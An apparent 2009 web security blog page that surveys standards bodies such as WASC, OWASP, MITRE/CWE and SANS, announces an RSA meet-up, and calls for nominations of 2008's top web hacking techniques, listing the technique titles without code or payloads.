A group of industry leading Web security experts whose membership are elected through a meritocracy based system. WASC tends to initiate projects that are of significant importance to Web Security, require high degree of domain expertise, and depend upon a wide collective involvement of key participants -- such efforts not easily performed by wide-open community groups. Upon release these projects are exceptionally well peer reviewed, provide quality results, and typically become immediately supported by the industry at large.
Web Application Firewall Evaluation Criteria (WAFEC)
An industry standard testing criteria for evaluating the quality of web application firewall solutions. The goal of this project is to develop a detailed web application firewall evaluation criteria; a testing methodology that can be used by any reasonably skilled technician to independently assess the quality of a WAF solution.
Web Application Firewalls (WAF) can be an extremely complex set of technology and difficult to evaluate in fair and straightforward manner. The WAFEC v1 provides a framework for how WAFs may be compared and what areas are most important to focus on. Not a product review in and of itself, it’s instead a guideline to follow. A version 2 update should begin sometime early this year.
Web Application Security Scanner Evaluation Criteria (WASSEC)
A set of guidelines to evaluate web application security scanners on their identification of web application vulnerabilities and its completeness. It will cover things like crawling, parsing, session handling, types of vulnerabilities and information about those vulnerabilities. This document shall evaluate the technical aspects of the web application security scanners and NOT the features provided by it. This document should define the minimum criteria to be followed by a web application scanner.
Similar to WAFEC, the Web application vulnerability scanners can be exceptionally complex and difficult to evaluate. The WASSEC, currently in active development, provides framework for how scanners may be compared and what areas should be focused upon. This is not a product review exercise, but instead a guideline to follow, perhaps to perform such reviews.
Web Security Threat Classification (WASC-TC)
A cooperative effort to clarify and organize the threats to the security of a web site. The members of the Web Application Security Consortium have created this project to develop and promote industry standard terminology for describing these issues. Application developers, security professionals, software vendors, and compliance auditors will have the ability to access a consistent language for web security related issues.
An extremely comprehensive taxonomy of all the Web-based attacks a website might expect to endure, with a strong emphasis on agreed upon terminology, definition, and structure. The Threat Classification may be considered a superset to the OWASP Top Ten. The content has been heavily vetted and is widely supported by vulnerability scanners, Web application firewalls, consultants, and enterprises. The TC purposely left out notions or vulnerability prevalence and default severity rating. Version 2 is presently in active development and nearing completion, expected to be a substantial improvement upon the original.
Open Web Application Security Project (OWASP)
The Open Web Application Security Project (OWASP) is a worldwide free and open community focused on improving the security of application software. Our mission is to make application security "visible," so that people and organizations can make informed decisions about application security risks.
An organization focused largely on the software development aspects of Web Application Security, spanning across several continents through locally organized member chapters and conferences, and enjoys a large membership base. OWASP is an excellent resource for developers and security practitioners, especially those who are new to Web Security and looking to get engaged with like-minded peers working on similar efforts.
Top Ten
Provides a powerful awareness document for web application security. The OWASP Top Ten represents a broad consensus about what the most critical web application security flaws are.
Designed to be an awareness building document, the Top Ten list is a combination of Web-based vulnerability prevalence tempered by expert analysis taking likely impact and exploitation into consideration. The Top Ten is not mean to be comprehensive or foundation of any standards, however it is cited as such in the PCI-DSS standard. Technically the document should be considered a subset of the Web Security Threat Classification. For security managers requiring something simple to pass around to upper management or developer groups unaccustomed to Web security, this is a great resource.
MITRE
A not-for-profit organization chartered to work in the public interest. As a national resource, we apply our expertise in systems engineering, information technology, operational concepts, and enterprise modernization to address our sponsors' critical needs.
CWE
Provides a unified, measurable set of software weaknesses that is enabling more effective discussion, description, selection, and use of software security tools and services that can find these weaknesses in source code and operational systems as well as better understanding and management of software weaknesses related to architecture and design.
A dictionary of software weakness terminology intended for developers and security practitioners. While CWE includes many aspects of Web security, its scope is much larger. In many ways this can be considered a superset of the WASC Threat Classification, even while the terminology might not map identically. Expect an increasing number of industry projects and standards to adopt this nomenclature when discussing security topics or organizing and naming findings.
CVE
A dictionary of publicly known information security vulnerabilities and exposures. CVE's common identifiers enable data exchange between security products and provide a baseline index point for evaluating coverage of tools and services.
Publicly disclosed vulnerabilities in commerical and open source software are captured by CVE in a dictionary with numbered identifiers. CVE does not include vulnerabilities in custom web applications. Most network vulnerability scanners will map their finding to CVE IDs.
CWE/SANS Top 25 Most Dangerous Programming Errors (2009)
A list of the most significant programming errors that can lead to serious software vulnerabilities. They occur frequently, are often easy to find, and easy to exploit. They are dangerous because they will frequently allow attackers to completely take over the software, steal data, or prevent the software from working at all.
MITRE (via CWE) and SANS (via SANS Top 20) joined forced to create a Top 25 list out of the hundreds of issues listed within the CWE. About half of the list is Web-based, roughly similar to the OWASP Top Ten, and rest deal with memory handling issues common to commercial and open source software. Again, not meant to be comprehensive, only a list of the more common and damaging issues. Think OWASP Top Ten in focus, but for all software types.
SANS
Established in 1989 as a cooperative research and education organization. Its programs now reach more than 165,000 security professionals around the world.
Top 20
A consensus list of vulnerabilities that require immediate remediation. It is the result of a process that brought together dozens of leading security experts. They come from the most security-conscious government agencies in the UK, US, and Singapore; the leading security software vendors and consulting firms; the top university-based security programs; the Internet Storm Center, and many other user organizations.
The “20” seems to be a misnomer now, the list is segmented into a variety of categories including client-side, server-side, network devices, etc. Each category lists a handful of major pressing threats that are a combination of prevelance, likely severity and odds of exploitation based upon an analysis of experts. For instance, in “ Web Applications “ listed is is PHP Remote File Includes, SQL Injection, Cross-Site Scripting, and Cross-Site Request Forger. Not meant to be comprehensive, but certainly things not to be overlooked. The 2008 release is expected to be forthcoming.
WASC RSA Meet-Up 2009!
For those going to the RSA Conference (San Francisco / April 20 – 24) and want to mingle with fellow Web application security people, the WASC meet-up is the place to be. Free drinks and appetizers will be served (sponsored by WhiteHat Security), and if its anything like last year its sure to rock! WASC meet-ups are rare opportunities to see those we only otherwise communicate with virtually, shoot some pool, and generally have a good time with people of similar security interests. Everyone is welcome, but remember the space at Jillan's is extremely limited. RSVP soon by filling out the form.
WASC RSA Meet-up
Wednesday, April 22, 2009
12:00 pm to 2:00 PM
Jillian's @Metreon
101 Fourth Street, San Francisco
415.369.6101
RSVP by April 17, 2009*
*Please stop by the WhiteHat booth to receive your special entry pass into the party.
WASC RSA Meet-up
Wednesday, April 22, 2009
12:00 pm to 2:00 PM
Jillian's @Metreon
101 Fourth Street, San Francisco
415.369.6101
RSVP by April 17, 2009*
*Please stop by the WhiteHat booth to receive your special entry pass into the party.
Tuesday, January 27, 2009
Some unanswered questions

- Do people trust QSAs who consider PCI-DSS 6.6 met if their organization only uses a network vulnerability scanner with a few web application security checks?
- Do organizations with a more mature software security program tend to deploy Web Application Firewalls more often than those who don't?
- As a result of economic downturn, what notable security projects are being cut from last years budget?
- Will Cross-Site Request Forgery security features be adopted through HTTP standardization, ad-hoc by Web browser vendors, or left solely up to website owners?
- Will secure code purchasing standards lead to secure code?
Monday, January 26, 2009
Calling all Researchers! Send in the Top Web Hacking Techniques of 2008
It's time once again to create the Top Ten Web Hacking Techniques of the past year. Every year Web security produces a plethora of new and extremely clever hacking techniques (loosely defined, not specific incidents), many of which are published in hard to find locations. 2008 was no different. As we've done for the past two years, we're looking for the best of the best. This effort serves as a way to create a centralized community reference and recognize those exceptional researchers who have contributed to our collective knowledge.
This year is special, because the researcher who places #1 will not only receive praise amongst his peers, but also receive one free pass to attend the BlackHat USA Briefings 2009! Over $1,000 (US) value. Generously sponsored by BlackHat. Winners will be chosen by a panel of judges (Rich Mogull, Chris Hoff, HD Moore, Jeff Forristal) on the basis of novelty, impact, and pervasiveness.
We’re also going to need your help. Below we’re building the living list of everything found so far. If anything is missing, and we’re positive there is because last year had over 80, we’d appreciate it if you could post a comment containing the link. Thank you and good luck!
The List
We’re also going to need your help. Below we’re building the living list of everything found so far. If anything is missing, and we’re positive there is because last year had over 80, we’d appreciate it if you could post a comment containing the link. Thank you and good luck!
The List
Cross-Site Printing(2007 issue)- CUPS Detection
- CSRFing the uTorrent plugin
- Clickjacking / Videojacking
- Bypassing URL Authentication and Authorization with HTTP Verb Tampering
- I used to know what you watched, on YouTube (CSRF + Crossdomain.xml)
- Safari Carpet Bomb
- Flash clipboard Hijack
- Flash Internet Explorer security model bug
- Frame Injection Fun
- Free MacWorld Platinum Pass? Yes in 2008!
- Diminutive Worm, 161 byte Web Worm
- SNMP XSS Attack (1)
- Res Timing File Enumeration Without JavaScript in IE7.0
- Stealing Basic Auth with Persistent XSS
- Smuggling SMTP through open HTTP proxies
- Collecting Lots of Free 'Micro-Deposits'
- Using your browser URL history to estimate gender
- Cross-site File Upload Attacks
- Same Origin Bypassing Using Image Dimensions
- HTTP Proxies Bypass Firewalls
- Join a Religion Via CSRF
- Cross-domain leaks of site logins via Authenticated CSS
- JavaScript Global Namespace Pollution
- GIFAR
- HTML/CSS Injections - Primitive Malicious Code
- Hacking Intranets Through Web Interfaces
- Cookie Path Traversal
- Racing to downgrade users to cookie-less authentication
- MySQL and SQL Column Truncation Vulnerabilities
- Building Subversive File Sharing With Client Side Applications
- Firefox XML injection into parse of remote XML
- Firefox cross-domain information theft (simple text strings, some CSV)
- Firefox 2 and WebKit nightly cross-domain image theft
- Browser's Ghost Busters
- Exploiting XSS vulnerabilities on cookies
- Breaking Google Gears' Cross-Origin Communication Model
- Flash Parameter Injection
- Cross Environment Hopping
- Exploiting Logged Out XSS Vulnerabilities
- Exploiting CSRF Protected XSS
- ActiveX Repurposing, (1, 2)
- Tunneling tcp over http over sql-injection
- Arbitrary TCP over uploaded pages
- Local DoS on CUPS to a remote exploit via specially-crafted webpage (1)
- JavaScript Code Flow Manipulation
- Common localhost dns misconfiguration can lead to "same site" scripting
- Pulling system32 out over blind SQL Injection
- Dialog Spoofing - Firefox Basic Authentication
- Skype cross-zone scripting vulnerability
- Safari pwns Internet Explorer
- IE "Print Table of Links" Cross-Zone Scripting Vulnerability
- A different Opera
- Abusing HTML 5 Structured Client-side Storage
- SSID Script Injection
- DHCP Script Injection
- File Download Injection
- Navigation Hijacking (Frame/Tab Injection Attacks)
- UPnP Hacking via Flash
- Total surveillance made easy with VoIP phone
- Social Networks Evil Twin Attacks
- Recursive File Include DoS
- Multi-pass filters bypass
- Session Extending
- Code Execution via XSS (1)
- Redirector’s hell
- Persistent SQL Injection
- JSON Hijacking with UTF-7
- SQL Smuggling
- Abusing PHP Sockets (1, 2)
- CSRF on Novell GroupWise WebAccess
Subscribe to:
Posts (Atom)